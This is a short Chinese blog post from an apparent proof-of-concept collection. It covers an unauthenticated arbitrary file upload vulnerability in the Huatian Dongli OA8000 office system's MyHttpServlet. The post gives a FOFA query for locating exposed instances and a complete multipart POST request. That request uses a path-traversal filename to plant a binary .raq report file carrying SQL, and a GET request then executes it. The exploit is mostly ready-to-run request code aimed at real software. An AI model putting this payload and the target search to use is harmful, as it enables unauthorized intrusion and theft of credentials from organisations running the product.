Pages

Menu

Babing
Published on 2024-08-30 / 2 Visits
0
0

H18-3华天动力-OA-文件上传

#Pocs

H18-3华天动力-OA-文件上传

漏洞描述:

华天动力OA MyHttpServlet 存在任意文件上传漏洞,未经身份认证的攻击者可上传恶意的raq文件并执行raq文件中的任意sql语句,获取用户账号密码等敏感信息。

影响版本:

OA8000平台版 DLHT-OA8000-3-0-7.2-3-1-0-500

网站图片:

image-20240621140153217

网络测绘:

fofa语法:

FOFA:app=“华天动力-OA8000”

漏洞复现:

payload:

POST /OAapp/MyHttpServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=9b0af0d79eaea67c3aa1889b0b43a50a
Accept-Encoding: gzip
Content-Length: 2428

--9b0af0d79eaea67c3aa1889b0b43a50a
Content-Disposition: form-data; name="file"; filename="\\Temp\\.//report/reportFiles/d4f0fE.jpg"

{{unquote("RQQR\x00\x00\x01\xf5\x00\x00\x00\x02\x00\x02\x00\x00\x00\x1c\xa5A\x00\x00\x00\x01\x00\x00\x00\x00\x02\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x06\xac\xed\x00\x05pp\x00\x00\x00\x1b\xb1B\x18ff\x01\x00\x00\x00\x00\x02\x00\x00\xff\xff\xff\xff\x00\x00\x00\x06\xac\xed\x00\x05pp\x00\x00\x00\xac\xff\xff\xff\xff\xd0\xe1P\xff\x00\x00\x00?\x80\x00\x00\x10\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\"1\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\xff\xff\xff\xf8Dialog\x00\x0c\xff\xff\xff\xff\xff\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xffP?@\x00\x00\xff\x00\x00\x00P?@\x00\x00\xff\x00\x00\x00P?@\x00\x00\xff\x00\x00\x00S?@\x00\x00\xff\x00\x00\x00\x00\x00\x00\x15\x00\x01\x28\x01\x00\x0f ds1.select\x28#1\x29\x00 \xc0\xff\xff\xff\xff\x00\x00\xff\xff\xff\xff\x00\x00\x00\x06\xac\xed\x00\x05pp\xff\xff\xff\xff\x00\x00\x00\x00\x00;\x00\x09\x00\x01\x00\x01\x00\x01\x00\x00\x00\x14\x00\x01\x00\x01\x00dCR\x00\x00C\x94\x80\x00A\x98\x00\x00A\x98\x00\x00A\xc8\x00\x00A\xc8\x00\x00\x01\x00\x00\x02\x00\x00\x02\x00\x02\x01\x01\x00\x00\xff\xff\xff\xfe\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00s\x00\x01\x01\xff\xff\xff\xd0com.runqian.report4.usermodel.SQLDataSetConfig\x00\x00\x00:\x00\x00\x00\x17\xff\xff\xff\xfbds1\xff\xff\xff\xfahtoa\xff\xff\xff\xfe\x00\x01\x00\x00\xff\xff\xff\xf1SELECT user\x28\x29\xff\xff\xff\xfe\xff\xff\xff\xfe\xff\xff\xff\xff\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x0a\x00\xff\xff\xff\xfe\x0b\x00\x00\x00\x00\x00\x00\x00\x12\xff\xff\xff\xfe\xff\xff\xff\xfe\x00\x00\x0f<\xff\xff\xff\xfe\x03\x01\x00\x00\x00d\x01\xff\xff\xff\xfe\x00\xff\xff\xff\xfe\xff\xff\xff\xff\xff\xff\xff\xfeRQQRRQQR\x1e\xf9\xb0\xac\xda\x8d\x80s\x83\xf4h\xc5\xc0#\xb4\xeb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")}}
--9b0af0d79eaea67c3aa1889b0b43a50a--

效果图:
PS:文件中的SQL语句是查询数据库当前用户

查看结果

GET /report/reportJsp/showHTReport.jsp?reportFile=上传的文件名 HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

H18-4华天动力-OA-任意文件读取
H18-2华天动力-OA-任意文件读取

Comment